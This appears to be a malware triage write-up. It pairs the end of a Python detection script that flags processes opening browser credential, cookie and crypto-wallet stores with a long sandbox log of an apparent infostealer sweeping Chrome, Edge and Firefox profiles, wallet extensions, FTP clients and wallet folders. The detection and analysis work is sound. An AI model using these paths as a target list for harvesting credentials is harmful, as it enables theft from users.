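            entry["wallets"].add(WALLET_EXTENSIONS[m.group(1).lower()])
    return report


STEALER = r"C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
CHROME_PROFILE = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
SAMPLE_EVENTS = [
    FileOpen(STEALER, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json"),
    FileOpen(STEALER, CHROME_PROFILE + r"\Login Data"),
    FileOpen(STEALER, CHROME_PROFILE + r"\Network\Cookies"),
    FileOpen(STEALER, CHROME_PROFILE + r"\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    FileOpen(STEALER, CHROME_PROFILE + r"\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai"),
    FileOpen(STEALER, r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet"),
    # constructed controls: the browser touching its own profile, and an unrelated file
    FileOpen(r"C:\Program Files\Google\Chrome\Application\chrome.exe", CHROME_PROFILE + r"\Login Data"),
    FileOpen(r"C:\Windows\System32\notepad.exe", r"C:\Users\user\Documents\notes.txt"),
]


def run_sample():
    return triage(SAMPLE_EVENTS)


if __name__ == "__main__":
    for proc, entry in run_sample().items():
        print(proc, dict(entry["categories"]), sorted(entry["wallets"]))
```

Unmapped extension IDs still count as extension_storage, so a process sweeping many of them stands out even when no wallet name is known; that is the same signal the report gives when it lists dozens of Local Extension Settings directories opened by one binary.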
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EFOYFBOLXA
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
